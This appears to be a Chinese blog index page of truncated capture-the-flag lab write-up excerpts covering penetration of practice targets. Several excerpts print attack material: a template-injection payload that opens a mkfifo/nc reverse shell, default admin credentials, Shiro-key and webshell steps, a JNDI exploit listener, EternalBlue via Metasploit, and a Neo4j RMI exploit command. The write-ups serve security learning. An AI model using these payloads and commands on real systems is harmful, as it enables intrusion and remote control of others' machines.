四大存储对象攻防
攻防矩阵 该矩阵从前期侦查、初始访问、执行、权限提升、权限维持、防御绕过、信息收集、横向移动和影响这九个维度展开,分别研究了每个维度下,云服务可能面临的威胁。 前期侦查 初始访问 执行 权限提升 权限维持 防御绕过 信息收集 横向移动 影响 ...
攻防矩阵 该矩阵从前期侦查、初始访问、执行、权限提升、权限维持、防御绕过、信息收集、横向移动和影响这九个维度展开,分别研究了每个维度下,云服务可能面临的威胁。 前期侦查 初始访问 执行 权限提升 权限维持 防御绕过 信息收集 横向移动 影响 ...
flag1(里哟给模板注入) fscan扫一下 参考文章:https://guokeya.github.io/post/WscncUrcS/ 里哟给模板注入漏洞命令执行 ?a=}{pboot{user:password}:if(("sys\x74em")("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc i...
flag1(O2oa) 8080端口一进去就是O2oa的后台登录界面 O2oa 默认账密 xadmin/o2oa@2022 登录进去,在应用——服务管理——接口配置新建一个接口 var a = mainOutput(); function mainOutput() { var classLoader = Java.type("java.lang.ClassLoader");...
flag1(入口机1) fscan先扫描一下 经典heapdump /actuator/heapdump 直接拿ShiroKey java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump 用工具注入冰蝎内存马,根目录拿到flag 一层代理 传入fscan和gost搭代理 fscan.exe -h 192.168...
flag1(华夏erp的Fastjson) start infoscan 39.99.138.162:8000 open 39.99.138.162:80 open 39.99.138.162:22 open [*] alive ports len is: 3 start vulscan [*] WebTitle http://39.99.138.162 code:200 len...
flag1 8080 端口存在 shiro 特征: 典中典春秋云镜的heapdump泄露 /actuator/heapdump下载下来,用JDumpSpider 分析找到shirokey 直接用工具Shiro 反序列化下马子 连接冰蝎 flag2(window特权利用) 扫描加搭代理 root@security:/# ./fscan -h 172.22.17....
flag1(log4j2打JNDI) fscan扫出来solr服务 看到有log4j2,打JNDI 先在vps上用JNDIExploit开启监听,并同时设置好反弹shell的监听 java -jar JNDIExploit.jar -i 8.148.230.29 nc -lvnp 23333 接着直接访问以下URL http://39.98.126.21:8983/so...
flag1 直接用Fscan扫描下 登录网站.扫描目录dirsearch 访问/docs可以发现是Tomcat 9.0.30,直接搜所相关漏洞,可以发现CNVD-2020-10487漏洞,可以进行任意文件读取和文件包含 得到flag1 flag2 内网扫描: 发现永恒之蓝漏洞 搭内网代理,然后kali直接MSF攻击 proxychains4 msfconso...
flag1 先fscan扫一下端口,扫出来8080端口有个后台服务 访问8080端口发现一个登录界面 发现这玩意根本不会发起登录请求,就是个前端壳子 dirsearch扫一下,看到有个404 访问404的路由即可拿到框架信息 /index.php/login/ 上工具扫,getshell 连接蚁剑,找到flag1 flag3(172.28.23.33) 信息收...
flag1 fscan扫一下 看到7474,neo4j网页端的默认端口 发现版本,搜一下看看有没有cve 打CVE-2021-34371 neo4j –> https://github.com/zwjjustdoit/CVE-2021-34371.jar java -jar rhino_gadget.jar rmi://39.99.229.213:1337 "bas...